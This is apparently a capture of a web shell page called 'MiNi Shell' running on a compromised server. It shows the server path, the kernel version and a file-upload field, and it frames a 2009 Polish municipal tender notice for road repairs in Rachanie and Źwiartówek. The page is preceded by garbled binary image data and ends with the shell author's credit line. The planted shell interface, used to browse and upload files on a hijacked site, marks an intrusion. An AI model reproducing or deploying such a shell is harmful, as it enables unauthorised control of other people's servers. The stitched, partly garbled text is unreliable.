JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/268150-N-2009.html

<p class="kh_header"><b>Rachanie: Remont dróg gminnych w miejscowości Rachanie i Źwiartówek</b><br>
<b>Numer ogłoszenia: 268150 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Rachanie , ul. Dolna 1, 22-640 Rachanie, woj. lubelskie, tel. 084 6471103, faks 084 6471103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rachanie.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg gminnych w miejscowości Rachanie i Źwiartówek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont dróg gminnych w miejscowości Rachanie i Źwiartówek. 
 Zadanie Nr 1: Remont drogi gminnej w miejscowości Rachanie - ul. Krzywa od km 0+045 do km 0+687 długości 0,642 km i szerokości podbudowy 3,00m - 3,50m. 
W zadaniu przewidziane jest wykonanie niżej wymienionych robót:
a) roboty przygotowawcze - dł. 642 m,
b) przełożenie sieci wodociągu - dł. 45 m,
c) roboty ziemne,
d) podbudowa  z betonu B-10 - dł. 462 m,
e) nawierzchnia z płyt MONO - dł. 180 m,
f) ścieki betonowe,
g) roboty wykończeniowe.

Zadanie Nr 2: Remont drogi gminnej w miejscowości Źwiartówek od km 0+000 do km 0+170 długości 0,170 km i szerokości podbudowy 3,50m. 
W zadaniu przewidziane jest wykonanie niżej wymienionych robót:
a) roboty przygotowawcze - dł. 170 m,
b) roboty ziemne,
c) poszerzenie przepustu Fi 80 - dł. 2 m,
d) podbudowa  z betonu B-10 - dł. 170 m,
e) mijanka,
f) wykonanie ścieku z prefabrykatów betonowych,
g) roboty wykończeniowe,
h) oznakowanie - znaki pionowe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości:
Zadanie Nr 1:   4 000,00 PLN ( słownie: cztery tys. PLN ).
Zadanie Nr 2:   2 000,00 PLN ( słownie: dwa tys. PLN ).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
a) udokumentują posiadanie aktualnego odpisu właściwego rejestru albo aktualnego
     zaświadczenia o wpisie do ewidencji działalności gospodarczej,
b) udokumentują posiadanie zaświadczeń potwierdzających uregulowanie zobowiązań
    wobec Urzędu Skarbowego, Zakładu Ubezpieczeń Społecznych lub Kasy
     Rolniczego Ubezpieczenia Społecznego.
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)	zrealizowali w ostatnich 5 latach co najmniej 1 roboty budowlanej w zakresie wykonania (remontu, budowy, przebudowy ) drogi w technologii podbudowy z betonu o wartości zamówienia minimum 150 tys. PLN (brutto), co potwierdzą dokumentami stwierdzającymi należyte wykonanie zamówienia,
b)	posiadają do dyspozycji lub będą dysponować niezbędnymi do wykonania zamówienia narzędziami i urządzeniami w szczególności:
1. koparka o poj. łyżki 0,25-0,60 m3 - szt.1
2. równiarka samojezdna 75 kW (100KM) - szt. 1,
3. walec ogumiony - szt. 1
4. samochód samowyładowczy 8 - 10 t. - szt. 2.
c)	dysponują osobami nadzoru posiadającymi uprawnienia niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (w specjalności drogowej z minimalnym 5 - letnim stażem pracy) oraz należącymi do właściwej izby samorządu zawodowego,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a)	pozwalającej na realizację zamówienia przy założeniu, iż zapłata za faktycznie wykonany zakres robót dokonywana będzie w terminie do 30 dni od daty zakończenia realizacji zamówienia oraz dostarczenia faktury Zamawiającemu,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.
3.	Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy 
z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Dokumenty lub oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu:
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert;
2)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego
      oddział  Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia
      Społecznego  potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem 
      podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub
      zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
      na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego
      organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu
      składania wniosków o dopuszczenie  do udziału w postępowaniu o udzielenie
      zamówienia albo składania ofert. 
3)	oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22, ust. 1 pkt. 1-3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i o nie podleganiu wykluczeniu z postępowania zgodnie z art. 24 -           ( załącznik Nr 2 do SIWZ ),
4)	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem  wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających , że roboty te zostały wykonane należycie - ( załącznik nr 3 do SIWZ )
            Wymagane minimum co najmniej jednej roboty budowlanej w zakresie wykonania 
            (remontu, budowy, przebudowy ) drogi w technologii podbudowy z betonu o wartości
            zamówienia minimum 150 tys. PLN (brutto), wraz z dokumentami potwierdzającymi, 
            że roboty zostały wykonane należycie.
5)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - (załącznik nr 4 do SIWZ ) 
      Wymagane dysponowanie osobą posiadającą uprawnienia z zakresu kierownika 
       budowy  z minimalnym 5 - letnim stażem pracy, w tym:
-	uprawnienia w specjalności  drogowej,
-	zaświadczenie z właściwej izby samorządu zawodowego o wpisie na listę członków,
 (wyżej wymienione dokumenty należy dołączyć do oferty )
6)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 5, wykonawca wskazał osoby, którymi będzie dysponował - ( załącznik nr 4a do SIWZ )
7)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca - (załącznik nr 5 do SIWZ )
Wymagane dysponowanie co najmniej następującym sprzętem:
1. koparka o poj. łyżki 0,25-0,60 m3 - szt.1
2. równiarka samojezdna 75 kW (100KM) - szt. 1,
3. walec ogumiony - szt. 1
4. samochód samowyładowczy 8 - 10 t. - szt. 2.
8)	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa w pkt 7, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował - ( załącznik nr 5a do SIWZ )
2.	W przypadku Wykonawców wspólnie ubiegających się o zamówienie:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone w pkt. 1, 
ppkt. 1,2,
2)	warunki dotyczące wymaganego doświadczenia, posiadanego potencjału technicznego 
i osobowego oraz sytuacji ekonomiczno - finansowej badane będą łącznie - dokumenty określone pkt. 1, ppkt. 4, 5, 6, 7, 8  winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w pkt. 1 ppkt. 3 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
3.	Zamawiający, na podst. art. 26 ust. 3 ustawy, wezwie Wykonawców, którzy w terminie składania ofert nie złożyli oświadczeń lub dokumentów określonych w pkt. 1 lub pełnomocnictw, lub którzy złożyli dokumenty zawierające błędy lub wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
4.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1, ppkt. 1 i 2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Dz. U. z 2006r. Nr 87, poz. 605 z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rachanie.lubelskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rachanie, ul. Dolna 1, 22-640 Rachanie, pokój nr 1. Koszt SIWZ wynosi 100,00 PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2009 godzina 11:00, miejsce: Urząd Gminy w Rachaniach, ul. Dolna 1, pokój nr 10 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 26.09.2009.</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont drogi gminnej w miejscowości Rachanie - ul. Krzywa od km 0+045 do km 0+687 długości 0,642 km i szerokości podbudowy 3,00m - 3,50m..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zadaniu przewidziane jest wykonanie niżej wymienionych robót:
a) roboty przygotowawcze - dł. 642 m,
b) przełożenie sieci wodociągu - dł. 45 m,
c) roboty ziemne,
d) podbudowa  z betonu B-10 - dł. 462 m,
e) nawierzchnia z płyt MONO - dł. 180 m,
f) ścieki betonowe,
g) roboty wykończeniowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont drogi gminnej w miejscowości Źwiartówek od km 0+000 do km 0+170 długości 0,170 km i szerokości podbudowy 3,50m..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zadaniu przewidziane jest wykonanie niżej wymienionych robót:
a) roboty przygotowawcze - dł. 170 m,
b) roboty ziemne,
c) poszerzenie przepustu Fi 80 - dł. 2 m,
d) podbudowa  z betonu B-10 - dł. 170 m,
e) mijanka,
f) wykonanie ścieku z prefabrykatów betonowych,
g) roboty wykończeniowe,
h) oznakowanie - znaki pionowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com